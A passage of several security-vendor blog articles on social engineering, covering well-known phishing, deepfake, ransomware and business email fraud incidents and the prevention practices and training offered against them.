The attack was extremely expensive for Anthem as well, costing them $230 million for remediation efforts. The aftermath of the attack required Anthem to allocate $115 million to settle lawsuits, $39.5 million to resolve the state attorney’s general investigation, and an additional $16 million to address the HIPAA audit and subsequent HIPAA violation fine .

A subsequent investigation led by government officials and the cybersecurity firm Mandiant claimed that the attack was state-sponsored but didn't name any perpetrators.

Healthcare organizations are particularly vulnerable to cyber-attacks. phoenixNAP's Data Security Cloud is purpose-built to meet the stringent requirements of the healthcare sector. With strong encryption, rigorous access controls, and comprehensive data backup and recovery solutions, we ensure unparalleled security for protected health information.

9. Evaldas Rimasauskas Wire Fraud

From 2013 to 2015, a Lithuanian called Evaldas Rimasauskas stole $99 million from Facebook and $23 million from Google by creating fake invoices. With meticulously crafted emails, he deceived the companies' employees into paying for goods they did not order or receive.

Using a technique similar to "typo squatting" or " URL hijacking ," Evaldas created a company in Latvia with a name closely resembling Quanta Computer Inc., a reputable Taiwanese electronics manufacturer. Under this guise, he conducted fraudulent multimillion-dollar transactions with Google and Facebook, forwarding the funds to his bank accounts in Latvia and Cyprus.

To cover his tracks, he fabricated invoices, contracts, and letters bearing forged signatures of Google and Facebook executives and agents. Surprisingly, neither company scrutinized the legitimacy of these documents.

His fraudulent activities ended when Lithuanian authorities apprehended him in 2017 and he was subsequently extradited to the United States. Rimasauskas pleaded guilty to one count of wire fraud and was sentenced to 60 months in prison.

10. AI Deepfake Scam Hits UK Energy Firm

In 2019, criminals used AI voice emulation software to steal €220,000 from a UK energy firm in a textbook example of a whaling attack – a spear phishing attack against a high-level executive.

The scammers successfully impersonated the German CEO of the UK energy firm's parent company. The scammers persuaded the UK CEO to urgently send money to a Hungarian supplier, which was, in fact, their account.

Shortly after the UK CEO sent the €220,000, the hackers called again, claiming they had sent money to reimburse him for the urgent transaction. Later that day, they made a third call, once more impersonating the CEO and requesting a second payment.

The UK CEO grew suspicious as the reimbursement had not arrived, and the third call came from an Austrian phone number. Consequently, he decided not to proceed with the second payment.

Following the transfer to the Hungarian bank account, the funds were moved to Mexico and distributed to other locations.

During the investigation, it was concluded that the perpetrators had employed commercial software to impersonate the German executive's voice. This is one of the first known occurrences of AI voice mimicry being used for fraud.

To date, investigators have not identified any suspects and have had to end the investigation.

How to prevent social engineering attacks.

The widespread digitalization of most aspects of society defines our era. As cybercrime continues to rise, the importance of cybersecurity will only increase. To stay ahead of the curve, read our article on how to prevent social engineering attacks , featuring seventeen security experts.

11. Google Drive Scam

In 2020, a phishing scam weaponized push notifications to drive its victims to malware-riddled websites. Exploiting a flaw within Google Drive, scammers sent seemingly genuine push notifications and emails from Google, prompting Gmail users to click on the "Open in Docs" button in the email. Upon doing so, users were directed to an authentic Google-hosted page, where they were asked to grant permission to a seemingly legitimate service called "Google Docs" to access their email account data.

Unfortunately, providing permission granted the scammers access to the victim's email account, contacts, and online documents. The malware then automatically sent emails to everyone in the victim's contact list to further propagate itself.

While phishing is not a new tactic, the alarming aspect of this scam is that the emails and notifications originated directly from Google. Since the messages appeared legitimate, users were caught off-guard.

Upon receiving victim reports, Google promptly removed the documents utilized in the scam and addressed the security flaw.

12. Reveton

In 2012, the Reveton ransomware strain gained notoriety as the first Ransomware-as-a-Service (RaaS) operation . It provided gangs with limited technical expertise, ransomware tools, and infrastructure with the means to conduct attacks without having to developing the malware themselves. Today, almost anyone can create highly effective malware campaigns, thanks to RaaS.

Another notable aspect of Reveton is its aggressive and intimidating approach. Nicknamed a "Police Trojan," it locked the victim's screen, displaying a fake message from law enforcement agencies, falsely accusing them of illegal activities such as copyright infringement or having a connection to child pornography.

To unlock the computer, the hackers demanded payment of a "fine," exploiting official logos and language to instill urgency and fear in the victim. In this aspect, Reveton serves as a prime example of hackers skillfully using social engineering to establish credibility.

Moreover, the ransomware utilized the user's computer IP address and webcam imagery to create the illusion of constant monitoring and recording, manipulating the victim into succumbing to the ransom demand.

13. The Lapsus$ Hacking Group

In late 2022, the UK police arrested two teenagers, Arion Kurtaj (18) and an unnamed 17-year-old, for their involvement in hacking various organizations. The long list of companies includes Nvidia, Rockstar Games, Revolut, BT Group, Uber, and even the cloud storage servers of the London Police .

The prosecutor assigned to the case emphasized that the hackers were not merely indulging in "juvenile pranks" but in sophisticated crime with the aim to profit.

The young hacker's resume includes the following:

Stealing sensitive code and videos of Rockstar's latest Grand Theft Auto game and leaking the information while demanding a ransom. Kurtaj allegedly used social engineering to pose as a contractor within the company and breach the firewall.
The pair accessed software building blocks for Nvidia's products, publicly releasing some of the stolen data and threatening to release the rest if they didn't receive a ransom.
The teenagers also allegedly hacked BT and engaged in SIM swap fraud, draining the cryptocurrency and bank accounts of multiple customers.

While being astonishingly competent for someone so young, the pair’s had a penchant for bragging that eventually led to their demise. After boasting about their exploits online, the police quickly identified and arrested the hackers , who are still awaiting final sentencing.

14. Barbara Corcoran Phishing Incident

In 2020, Barbara Corcoran, the host of the reality television series Shark Tank, was nearly scammed out of $400,000 .

The scam was a phishing attack in which the scammer successfully deceived Corcoran's bookkeeper with an email that looked like it was from her assistant. The email asked the bookkeeper to wire money to a fictitious contractor working on a European renovation project.

As Corcoran herself remarked, "The story was totally plausible because I invest in a lot of real estate and do a lot of renovations for a living."

In a stroke of luck, the German-based bank the bookkeeper used to transfer the money froze the transaction before it reached the scammer's account in China. Corcoran explained that her bank in New York requested the German bank to suspend the transfer, allowing her to provide evidence of fraud.

15. Cabarrus County Hack

In 2018, hackers successfully persuaded Cabarrus County, NC officials to give them more than $2.5 million.

Posing as representatives from a construction contractor, the scammers contacted officials, pretending to be involved in the construction of a local high school, which was genuinely being built. They skillfully convinced the officials to change the bank account to which they made payments for the construction of the school. To strengthen their deception, they provided what appeared to be legitimate documentation and approvals.

Once the criminals received the deposit, the funds were rerouted through various other accounts. Several weeks later, the scheme came to light when the genuine vendor contacted the officials, inquiring about a missed payment.

The authorities eventually recovered a portion of the funds, reducing the damage to 1.7 million .

The first line of defense against cybercrime is having a strong password and following email security best practices . Just following these common-sense procedures would have made the difference between getting hacked or not in many of the examples listed above.

As the sophistication of the attackers has grown, so has the technology used to thwart them. AI-assisted intrusion detection systems and firewalls stand at the forefront of defense against modern cybersecurity threats. They can analyze vast amounts of data, detecting anomalies, patterns, and breaches in real time.

However, as formidable as these technologies are, they cannot single-handedly shield us from determined criminals. By prioritizing cybersecurity training for employees, organizations build a robust human firewall that fortifies their defenses and creates a united front that stands as a bulwark against potential cyber threats.

Cloud Computing
Company News
Data Centers
Data Protection
Dedicated Servers
Disaster Recovery
Security Strategy
Virtualization

February 27, 2024

What Is Social Engineering? Examples & How To Prevent It

In the ever-evolving landscape of cybersecurity, social engineering emerges as a sophisticated form of manipulation, exploiting the most unpredictable element of security systems: the human factor. Unlike traditional cyberattacks that target system vulnerabilities through technical means, social engineering attacks focus on manipulating individuals to voluntarily compromise security protocols, revealing confidential information, or granting unauthorized access. Understanding social engineering is paramount in the digital age, where information is both the most valuable asset and the most vulnerable target. This article aims to dissect the concept of social engineering, illustrating its dangers, methodologies, and the importance of awareness and proactive measures to mitigate its risks.

What Is Social Engineering?

Social engineering is a cyber threat that leverages human psychology rather than exploiting technical vulnerabilities. It involves deceptive tactics to manipulate individuals into breaking normal security procedures, often leading to unauthorized access to systems, data theft, or financial fraud. This form of attack distinguishes itself from other cyber threats by its reliance on human interaction and the exploitation of trust, making it a uniquely challenging issue to address. Unlike hacking or malware attacks that target system weaknesses, social engineering targets the human psyche, exploiting emotions and cognitive biases to achieve malicious ends. Social engineering in cyber security underscores the critical need for a nuanced understanding of how these attacks leverage human vulnerabilities.

Why Is Social Engineering Dangerous?

The danger of social engineering lies in its ability to bypass the most advanced technical security measures through the manipulation of human behavior. Successful social engineering attacks can lead to significant data breaches, financial losses, and severe reputational damage for individuals and organizations alike. The insidious nature of these attacks exploits the inherent trust and curiosity within human interactions, making everyone a potential target. By understanding the profound impact of these social engineering attacks, we underscore the critical need for vigilance and education in cybersecurity practices. The principles of social engineering highlight how attackers manipulate basic human tendencies—such as the desire to be helpful or the fear of authority—to bypass security protocols.

Types of Social Engineering Attacks

Social engineering attacks come in various forms, each with unique methodologies and objectives. Some of the most common types include:

Phishing : Attacks that are designed to spoof emails or messages to elicit sensitive information, a direct application of social engineering principles in cyber security to exploit trust. Incorporating phishing simulation exercises and phishing awareness training into organizational security protocols can significantly enhance the ability to recognize and respond to these tactics.
Baiting : Offering something enticing to compromise security protocols, leveraging human curiosity.
Pretexting : Fabricating scenarios to divulge privileged information, an intricate use of social engineering in cyber security to create believable stories that lower defenses.
Tailgating : A social engineering technique following authorized personnel into restricted areas, exploiting the social norm of holding doors open for others.
Quid pro quo : Offering a benefit in exchange for information or access, capitalizing on human reciprocity tendencies.
Scareware : Frightening users into downloading malicious software, manipulating fear and urgency.
Watering hole attacks : Compromising commonly used websites to target a specific group, a strategic application of social engineering principles to exploit trust in familiar online spaces.
Business email compromise : Impersonating high-level executives to authorize fraudulent transactions, exploiting authority and trust within organizations.
Physical social engineering : Directly interacting with individuals to manipulate them into compromising security, using social engineering principles to exploit human willingness to assist.

These attacks exploit various aspects of human nature, from trust to curiosity, emphasizing the need for comprehensive security awareness training against social engineering.

Real-World Examples of Social Engineering

The digital landscape is littered with the fallout from successful social engineering attacks, each serving as a stark reminder of the cunning employed by cybercriminals and the often catastrophic impact on their targets. Delving into real-world examples of social engineering provides a clear lens through which we can understand the diverse strategies used by attackers and underscore the critical need for comprehensive security defenses and heightened awareness. Here are notable instances that highlight the cunning of social engineering:

The Twitter Bitcoin Scam (2020) : In a bold display of social engineering, hackers compromised high-profile Twitter accounts, including those of celebrities and politicians, to promote a Bitcoin scam. By gaining the trust of followers, the attackers solicited Bitcoin transfers with the promise of doubling any amount sent. This attack spotlighted the effectiveness of social engineering in manipulating trust and the importance of securing social media accounts against unauthorized access.
The Sony Pictures Hack (2014) : In an instance of social engineering combined with sophisticated hacking techniques, attackers breached Sony Pictures’ network, leading to the leak of confidential data, personal emails, and unreleased films. The incident serves as a cautionary tale about the potential for social engineering attacks to exploit human vulnerabilities, underscoring the need for a multi-layered security strategy that includes educating employees on social engineering tactics.
The Target Data Breach (2013) : Attackers gained access to Target’s network through a phishing email sent to a third-party vendor, leveraging this entry point to compromise the retailer's payment system and exposing the personal and financial information of millions of customers. This breach emphasizes the necessity of phishing awareness training and the vigilance required in monitoring third-party access to protect sensitive information.

These examples demonstrate the varied and sophisticated nature of social engineering attacks, exploiting both human psychology and technological vulnerabilities. They serve as compelling arguments for the implementation of rigorous security measures, including regular security awareness training and phishing simulation exercises, to protect against future attacks. The key takeaway from these incidents is the imperative need for ongoing vigilance, education, and adaptation in the face of evolving social engineering tactics.

What Makes You Vulnerable to Social Engineering?

Common psychological factors such as trust, fear, curiosity, and complacency significantly contribute to an individual's susceptibility to social engineering. The lack of awareness or insufficient training on the latest cybersecurity threats further increases vulnerability to social engineering, highlighting the need for continuous education and proactive security practices. It's the exploitation of these psychological factors that social engineering in cyber security so effectively leverages.

Typical Targets of Social Engineering Attacks

Attackers often target groups or individuals with access to sensitive information or resources, including employees in key industries, high-level executives, and even the general public. Understanding the criteria used by attackers to choose their targets can help in developing targeted defense strategies against social engineering, supported by relevant statistics and studies. The selection of targets often follows social engineering principles, focusing on those most likely to yield access or information with minimal resistance.

How To Recognise a Social Engineering Attack

The ability to recognize a social engineering attack hinges on sharpened situational awareness and honed critical thinking skills. In the nuanced world of cybersecurity threats, social engineering maneuvers through the gray areas of human interaction, making its detection both critical and challenging. To arm oneself against these covert operations, it's essential to be aware of the signs that signal a social engineering attempt. Here are practical tips and indicators that can help identify these deceptive strategies:

Unexpected Requests for Information : Be wary of unsolicited requests for sensitive information, especially if the requestor pressures for immediate disclosure. Authentic organizations typically follow known protocols that do not involve urgent demands for personal or financial details.
Mismatched Email Addresses and Links : Scrutinize the sender's email address and any links contained in the message. A common phishing tactic involves spoofing email addresses to appear legitimate, but upon closer inspection, discrepancies become apparent. Hover over links to preview the URL before clicking, ensuring it directs to a credible site.
Typos and Grammatical Errors : Professional communications are generally free of significant errors. Messages riddled with typos and grammatical mistakes should raise red flags, as they may indicate a phishing attempt or other forms of social engineering.
Sense of Urgency or Threats : Social engineering attacks often create a false sense of urgency or convey threats to compel the victim to act hastily, bypassing their better judgment. Question the legitimacy of any communication that pushes for quick action under the threat of consequences.
Requests for Verification of Personal Details : Be cautious of communications asking you to confirm or divulge personal details or passwords. Legitimate entities already have this information and would not request it in such a manner.
Unusual Sender Behavior : If an email or message from a known contact seems out of character or asks for unusual actions, it could be a sign of a compromised account being used for a social engineering attack. Verify the request through a separate communication channel.
Offers That Seem Too Good To Be True : Social engineering often uses baiting tactics by promising rewards or incentives that seem too generous or come out of nowhere. Approach such offers with skepticism and verify their authenticity.

Enhancing your ability to detect these attempts is an ongoing process. Engaging in regular security tests can significantly improve awareness and preparedness, making it easier to spot and sidestep social engineering attacks. Moreover, phishing awareness training plays a crucial role in educating individuals on the evolving nature of these threats, empowering them with the knowledge and tools to defend against social engineering. Remember, in the realm of cybersecurity, skepticism and verification are your strongest allies.

How To Prevent Social Engineering Attacks

Preventing social engineering attacks involves a combination of training, policy development, and technological solutions. By fostering a culture of security awareness and adopting a proactive stance towards cybersecurity, individuals and organizations can significantly reduce their risk of being victimized by these deceptive social engineering tactics. The goal is to protect the information and maintain robust security measures.

Evolving Trends in Social Engineering

As we navigate through an increasingly digital world, the sophistication of social engineering attacks continues to grow, leveraging emerging technologies and exploiting human behaviors in novel ways.

Deepfake technology, which uses artificial intelligence to create realistic audio and video impersonations, presents a significant threat. Attackers can now create convincing messages from seemingly trustworthy sources, making it harder to distinguish genuine communications from social engineering attacks. This advancement could lead to an increase in business email compromise attacks, where attackers spoof high-level executives to authorize fraudulent transactions or divulge sensitive information.

Another growing concern is the exploitation of social media platforms. Social engineering attackers are increasingly using these platforms to gather personal information about their targets, tailoring their attacks with a precision that makes them more effective than ever. This method not only undermines the trust in social interactions online but also highlights the need for enhanced phishing awareness training that addresses the nuances of social media spoofing.

Predicting future challenges, the integration of artificial intelligence (AI) and machine learning (ML) into social engineering attacks could lead to more automated and adaptive phishing campaigns. These campaigns could dynamically adjust their approaches based on the effectiveness of previous attacks, making them more difficult to detect and prevent.

To stay one step ahead of these evolving threats, organizations and individuals must prioritize continuous learning and adaptation in their cybersecurity strategies. Emphasizing the importance of phishing simulation exercises and security awareness training will be key in equipping people with the skills to recognize and respond to social engineering attacks. Moreover, fostering a culture of security that evolves with the technological landscape and social engineering tactics will be crucial in mitigating the risks associated with these ever-changing threats.

Stay One Step Ahead With Living Security

By staying informed about the latest tactics used by attackers and incorporating Living Security's innovative solutions into your cybersecurity strategy, you can protect your data and maintain a strong defense against these manipulative social engineering attacks. Let us empower you with the knowledge and tools to safeguard your information in this digital age, utilizing tools like phishing simulation and security awareness training to enhance your organizational security posture.

The 13 Most Common Types of Social Engineering Attacks + How to Defend Against Them

Table of Contents

Clone phishing

Quid pro quo, business email compromise & ceo fraud, spear phishing & whaling, smishing & vishing, watering hole attacks, how to protect your organization.

July 04, 2023

Emily Bonnie

Senior Content Marketing Manager at Secureframe

Anna Fitzgerald

The average organization is targeted by 700+ social engineering attacks each year. That’s nearly three attacks every single day. And with 98% of all successful cyberattacks involving some form of social engineering , it’s essential for organizations to understand the most pervasive attack methods.

What is social engineering exactly, and why does it pose such a significant threat to organizations today? In this article, we’ll discuss 13 common types of social engineering attacks, explain how they work, provide real-life examples, and share best practices for preventing them.

1. Phishing

Phishing is one of the most common social engineering techniques. With phishing scams, attackers send emails that appear to be from reputable sources to trick individuals into revealing sensitive information like passwords and credit card numbers.

These emails often inspire a sense of urgency, prompting the victim to click on a malicious link. This link leads them to a fake website where they are asked to enter personal data such as login credentials, account information, social security numbers, or other confidential information.

In 2013, Target Corporation fell victim to a phishing attack where attackers initially gained access to their network through a phishing email sent to an HVAC company that had connections with Target. This led to a data breach that compromised the credit card information of over 40 million customers.

Target isn’t the only organization to suffer a cyberattack in this way: a 2022 study conducted by Ponemon Institute revealed 54% of organizations experienced a data breach caused by one of their third-party vendors in the previous 12 months.

2. Clone phishing

Clone phishing is a special type of phishing attack where a legitimate email is used to create an almost identical or "cloned" email but with some critical changes.

Here is how clone phishing campaigns typically work:

Email selection : The attacker selects a legitimate email that was sent to the intended victim. This email could be anything from a routine company announcement to an invoice or an account notification.
Creating the clone : The attacker makes a copy or "clone" of the email, reproducing it as closely as possible to the original.
Altering the content : The attacker alters some elements of the cloned email. This usually involves changing the links or attachments within the email to malicious ones. For example, where the original email might have contained a link to an online invoice, the clone could contain a link to a malicious website designed to harvest login credentials.
Resending the email : The attacker sends the cloned email to the original recipients but makes it appear as if it's coming from the same sender as the original email. This might be accompanied by a pretext such as an updated link, a corrected version of the attachment, or any excuse that seems plausible.
Victim's response : If recipients of the cloned email believe it's a legitimate follow-up to the previous email, they might click on the link or download the attachment without suspicion. This can lead to the compromise of sensitive data or malware infection.

Clone phishing is particularly effective because it uses the trust established by the original, legitimate email to bypass the victim's defenses. It's always important to verify the authenticity of email communications, especially those containing links or attachments, even if they appear to come from a known source. It’s advisable to contact the person or company directly to confirm the legitimacy of the email, especially if the email seems unexpected or slightly different from the usual communication style.

If you successfully spot a phishing email, it can be tempting to respond to the scam attempt and tell them off — but this isn’t a good idea. For one, replying to a phishing email verifies that your email address is active, which can make you a high priority for follow-up attacks, or for your email address to be sold to other attackers. Your reply can also give cybercriminals access to additional information such as location data or your company’s email signature, which can include phone numbers, addresses, and other information they can use to create more convincing phishing campaigns — or potentially snare your co-workers or LinkedIn contacts.

3. Pretexting

Pretexting involves an attacker creating a fabricated scenario to obtain information from a target. They often impersonate someone in a position of authority or someone with a legitimate reason for needing the information.

The attacker builds a story that convinces the victim to divulge sensitive information or perform an action that compromises security.

Pretexting as a tactic is used in a variety of social engineering attacks, particularly phishing, whaling, and business email compromise. But cybercriminals can also use pretexting on its own to steal valuable information from their victims.

In 2016, a hacker gained access to data for thousands of employees at the Justice Department and Department of Homeland Security, including email addresses and phone numbers, by impersonating a government employee. They later published the information online.

In 2017, MacEwan University sent nearly $9 million to someone posing as a contractor with a construction company working on a new building project. A supporting letter attached to the email appeared to have been signed by the actual construction company’s chief financial officer, and the university wired the money to the bank account specified in the email. The scam wasn’t discovered until the real construction company reached out to inquire about the outstanding balance.

The school eventually recovered more than 90% of the lost funds , but only after lengthy legal proceedings and a lot of media attention. They’ve since instituted new processes and security awareness training for all employees.

Last year, the FBI warned healthcare organizations against schemes to extort money or steal personally identifiable information (PII) using pretexting. Scammers spoof authentic phone numbers or use fake credentials to masquerade as agency officials. They then notify targets that they were subpoenaed to provide expert witness testimony in a criminal or civil case, failed to appear, and have been held in contempt of court and issued a fine. Failure to pay the fine would result in an arrest warrant, with scammers using aggressive tactics to pressure targets into paying immediately via wire transfer, cash by mail, or cryptocurrency.

Baiting is similar to phishing but involves the promise of a specific item that the attacker uses as bait. This could be free software, gift cards, movie or music downloads, or anything else that seems appealing to the target. The attacker uses this bait to entice the victim into downloading malicious software or revealing login credentials.

USB drops are a classic example of baiting. The US Department of Homeland Security once ran a test on government employees to see how easy it would be for hackers to install malware or gain access to computer systems. USB drives were dropped in parking lots of government agencies and private contractors — and 60% of the people who picked them up plugged them into their devices. If the drive had an official logo on it, 90% were plugged in.

5. Quid pro quo

With quid pro quo attacks, threat actors prey on the law of psychological reciprocity — when someone helps us out, we want to return the favor.

Often, quid pro quo attacks happen when cybercriminals pose as IT or tech support. They may offer to install anti-virus software or resolve an issue with a computer system in exchange for sensitive information like login credentials. Once they gain access, they install malware or steal other sensitive data.

In one case, a threat actor impersonated Apple tech support to trick celebrities, musicians, and professional athletes into revealing sensitive information. Posing as Apple tech support, the cybercriminal asked victims for usernames and passwords or the answers to security questions. With this information, they could access the victim’s full Apple profile, including payment card and billing details. They could then change passwords, contact emails, and security questions. The scammer spent thousands of dollars on personal expenses charged to his victims’ accounts.

6. Business email compromise & CEO fraud

Business Email Compromise (BEC) is when an attacker gains access to a corporate email account and impersonates the owner to defraud the company or its employees, customers, or partners. They usually focus on employees who have access to company finances and trick them into conducting money transfers to bank accounts thought to be trusted.

CEO fraud is a specific type of BEC scam where attackers impersonate a CEO or another high-ranking managerial official. The attacker leverages the authority of the CEO to pressure an employee into conducting unauthorized transactions or sending sensitive data.

Snapchat fell victim to a BEC scheme in 2016 when scammers impersonated CEO Evan Spiegel. The company’s payroll department responded to an email appearing to come from Spiegel with sensitive payroll data — while the company didn’t publicly disclose exactly what information was shared, it could have included salary details, social security numbers, bank accounts, addresses, emails, and other personally identifiable information on its current and former employees.

7. Deepfaking

Deepfaking involves using AI technologies to create realistic images, videos, or audio to manipulate or deceive. Attackers can create audio and video that looks authentic, showing individuals saying or doing things they did not actually say or do.

In early 2020, the AI-created voice of a bank director was used to trick a bank manager into transferring millions of dollars to threat actors. The manager received a phone call from someone who sounded exactly like the director of his parent business, informing him that the company was about to make an acquisition. The manager was instructed to authorize a $35 million transfer — there were even emails in the manager’s inbox from the director and a lawyer confirming where the money needed to be transferred. Believing the instructions to be legitimate, the manager initiated the transfer.

Investigators in the UAE believe the elaborate scheme involved at least 17 individuals, with the stolen money sent to multiple bank accounts all over the globe.

As the cost to produce convincing deepfakes decreases, the FBI and Department of Homeland Security predict deepfake threats will become increasingly difficult to identify and protect against. As legislation is beginning to address the threats of deepfake videos, cybersecurity measures, such as detection algorithms, are being created to combat the threat.

8. Tailgating

Tailgating, also known as piggybacking, involves an unauthorized person physically following an authorized person into a restricted area.

The attacker may strike up a conversation or carry something to manipulate the authorized person into holding the door open for them.

While tailgating and piggybacking attacks typically refer to unauthorized physical access, in one interesting case a tech worker admitted to piggybacking off a hacker’s extortion attempt .

A UK company was hit by a ransomware attack in February 2018, during which the attacker demanded a $370,000 bitcoin payment. A member of the company’s incident response team saw an opportunity to launch a secondary attack — by altering the original ransomware email to swap out the cryptocurrency wallet address provided by the original attacker with his own. The employee also spoofed the attacker’s email address and began emailing the organization to pressure them into paying the ransom. He was later caught when authorities successfully tracked his IP address.

9. Spear phishing & whaling

Spear Phishing is a more targeted form of phishing. The attacker customizes their deceptive messages to a specific individual or organization.

The emails appear more legitimate and are often meticulously crafted to appeal to the victim.

In 2014, programmers backed by North Korea launched a spear-phishing attack against Sony Pictures to halt the release of the film The Interview . The attack resulted in the leak of sensitive data, including unreleased films.

In 2016, the US Democratic Party famously fell victim to a spear phishing attack that exposed sensitive information about the Clinton presidential campaign. Hackers created a fake email that prompted recipients to change their passwords due to unusual activity, then used new credentials to access sensitive information.

Whaling targets high-profile individuals, such as executives, celebrities, or politicians. The tactics are similar to spear-phishing but on a grander scale.

In 2008, a widespread whaling scheme snared as many as 2,000 corporate executives with a series of emails masquerading as official subpoenas. The email correctly addressed CEOs and other top executives by their full names and included details such as phone numbers, company names, and titles. Recipients were instructed to click on a link to a detailed copy of the subpoena and were then directed to install a browser add-on to read the document. Accepting the add-on actually installed a backdoor and keylogging software, allowing the scammers to steal credentials and other sensitive information.

10. Smishing & vishing

Smishing (SMS phishing) uses text messages, while Vishing (voice phishing) uses phone calls to scam the victim. These attacks are designed to steal sensitive data or money by posing as a legitimate entity.

In July 2020, Twitter famously suffered a hack of 130 blue-check verified accounts of some of the world’s most famous people — from politicians like Barack Obama and Joe Biden, celebrities and entrepreneurs like Bill Gates and Elon Musk, and global brands like Apple.

Hackers downloaded users’ Twitter data, accessed DMs, and published tweets promising to double donations to a bitcoin wallet. Within minutes, the scammers had received over $100,000 in bitcoin from hundreds of transactions.

Twitter explained the incident was the result of a vishing attack where Twitter employees were tricked into sharing account credentials that allowed the scammers access to the verified accounts. Twitter’s share price plunged 7% in pre-market trading the following day.

11. Watering hole attacks

In a watering hole attack, the attacker identifies a website or resource their target group frequently uses and infects it with malware to compromise members of the group. For example, if the target group is in the financial sector, the attacker might infect a popular financial news website.

In February 2021, hackers used a watering hole attack to gain access to a water treatment facility in Florida. They remotely changed a setting that drastically raised the amount of sodium hydroxide (lye) in the water to toxic levels. Luckily, an astute operator was able to catch the manipulation as it was happening and restored the levels to their normal range with no damage done.

An investigation into the attack revealed hackers had placed malicious code on an infrastructure contractor’s website. That code functioned as a fingerprinting script, collecting details about the website’s visitors, including operating system, CPU, browser plugins, input methods, camera presence, accelerometer, microphone, time zone, location, and more. When a computer on the water treatment plant’s network visited the contractor’s website, the malicious code allowed the hackers to install Remote Desktop software on one of the plant’s computers that was connected to the control system.

12. Scareware

Scareware tricks individuals into thinking their computer is infected with malware, urging them to install software that is actually malware itself. This is often encountered as pop-up advertisements or warnings while browsing the web.

In one famous example, the "Antivirus XP" scareware tricked users into paying for fake antivirus software by aggressively advertising security alerts on users' computers.

In 2019, Office Depot and Support.com agreed to pay a $35 million settlement after they were accused of using scareware tactics to deceive customers into purchasing unnecessary support and repair services. From 2008-2016, Office Depot and OfficeMax offered customers a free “PC Health Check” to scan devices for malware and performance problems. According to the FTC, the real purpose of the health check was to sell diagnostic and repair services that customers didn’t actually need.

The PC checkup program was programmed to report that repairs were necessary if the customer answered “yes” to any one of four questions asked, including whether customers were seeing frequent pop-up ads on their device. Suggested repair services could cost upwards of $300. While Office Depot never admitted any wrongdoing, they agreed to the settlement, which the FTC says was used to refund customers.

13. Ransomware

Ransomware is a type of malicious software, or malware, that encrypts a victim's files. The attacker then demands a ransom from the victim to restore access to the data upon payment. Users are typically shown instructions for how to pay a fee to get the decryption key. The costs can range from a few hundred dollars to thousands, payable to cybercriminals typically in bitcoin.

In April 2021, employees of Merseyrail, a UK rail operator, received an email from their boss’s email account with the subject line “Lockbit Ransomware Attack and Data Theft.” Journalists from national newspapers and tech news outlets were also copied on the emails.

The email explained that the company had been hacked and offered an image of an employee’s personal data as proof. The Lockbit scammers demanded a ransom to release the compromised data. Not only did the scammers steal sensitive data, they also put public pressure on the company to pay the ransom quickly. This tactic is often used to force organizations to rush into a payment, bypassing security protocols like informing relevant authorities and following established procedures.

15 best practices to protect your organization against social engineering attacks

To protect against social engineering attacks, organizations and IT teams should adopt a multi-layered approach that combines technology, processes, and human-centered initiatives. Here are some best practices to follow:

Educate and train employees: Technical safeguards like firewalls and spam filters can only do so much. Human error is one of the most pervasive vulnerabilities facing modern organizations – and one of the most difficult to remediate. Regularly conduct security awareness training to educate employees about different forms of social engineering attacks — at least annually, if not quarterly. Use real-life examples and simulations to make them aware of the tactics used by attackers.
Create clear security policies: Develop and enforce clear security policies regarding the handling of sensitive information. Make sure employees know whom to contact if they receive suspicious communications.
Use multi-factor authentication (MFA): Implement MFA for accessing sensitive systems. This ensures that even if login credentials are compromised, an additional layer of security is present.
Regularly update and patch systems: Keep all systems, software, and anti-virus programs up-to-date to reduce vulnerabilities that can be exploited.
Implement email filtering solutions: Use email filtering solutions to detect and prevent phishing emails from reaching users’ inboxes.
Use a least privilege model: Grant employees the minimum levels of access necessary for their job functions. This limits the potential damage in case of a compromise.
Maintain activity and access logs: Regularly monitor and log access to sensitive data. This can help quickly identify anomalous behavior and respond to a potential breach.
Encourage employees to report suspicious activity: Create a culture where employees feel comfortable reporting any suspicious activity or communication without fear of repercussions.
Secure physical access : Implement security measures such as access cards, biometrics, and visitor logs to prevent unauthorized physical access to facilities (tailgating).
Conduct regular internal security audits: Conduct regular security assessments, including penetration testing and social engineering drills, to evaluate the effectiveness of your security controls.
Implement data encryption: Encrypt sensitive data both in transit and at rest. This ensures that even if data is intercepted, it remains secure.
Create an incident response plan: Have a well-documented incident response plan in place. This ensures that in case of an attack, your organization can respond effectively to mitigate damage.
Use contact verification: For any unusual requests involving the transfer of funds or sensitive data, establish a policy to verify the request through an alternative communication channel.
Adhere to legal and compliance requirements: Ensure that your security practices are in alignment with legal and compliance requirements. This may include adherence to standards like GDPR , HIPAA , or PCI DSS .
Strive for Continual Improvement: The threat landscape is always evolving, so it's crucial to regularly reassess and update policies, controls, and training programs.

Remember that humans are often the weakest link in security. A well-rounded approach that educates employees, implements strong technical controls, and establishes clear policies is key to defending against social engineering tactics.

How to Do an Internal Audit + Security Audit Checklist

Arm your team against social engineering attacks with Secureframe Training

Cybersecurity is not simply a technical issue; it's first and foremost a human issue. Even the most advanced security system can be compromised by a simple human error.

It’s crucial for employees to stay updated on the latest scams, threats, and attack techniques. Regular training equips teams with the knowledge they need to recognize and respond appropriately to a variety of cyber threats. Employees who understand the potential consequences of poor cyber hygiene are far less likely to fall victim to attacks and are more likely to take preventative measures seriously.

What’s more, security regulations and standards such as SOC 2 ,® ISO 27001 , HIPAA , GDPR , and PCI DSS require regular security awareness training. These standards recognize that protecting sensitive data requires an informed and vigilant workforce. When employees are equipped with the right knowledge and a security-conscious mindset, they can not only prevent incidents but also effectively respond in case of a security breach.

The Secureframe platform includes proprietary security awareness training, making it easy to assign, track, and report on required employee training. Our engaging training programs are kept up-to-date, so the latest best practices are learned and applied throughout your organization. You can also segment your workforce and assign just the training required for each group or role.

Learn more about Secureframe Training , or schedule a demo with a product expert.

What is the most popular form of social engineering attacks?

Phishing is the most popular form of social engineering, according to multiple sources. In 2022, phishing schemes were the number one crime type reported to the FBI's Internet Crime Complaint Center . In 2023, phishing was the top reason in confirmed breaches and made up 44% of social engineering incidents in Verizon's 2023 Data Breach Investigations Report .

What is a real life example of a social engineering attack?

The recent cyber attack on the prominent casino chain MGM Resorts reported on September 11, 2023 is a real life example of a social engineering attack. It appears that hackers impersonated an employee whose information they found on LinkedIn during a call to MGM’s IT help desk to obtain credentials to access and infect the systems. This was confirmed by a cybersecurity executive familiar with the investigation in a Bloomberg report .

What are warning signs of social engineering attacks?

Warning signs of social engineering attacks include:

The email, call, voice, or text message is unexpected . For example, say you receive a text message from the CEO of your company. This may be unexpected because they've never contacted you before or they've never used this channel to contact you before. This is a strong indicator of a social engineering attack.
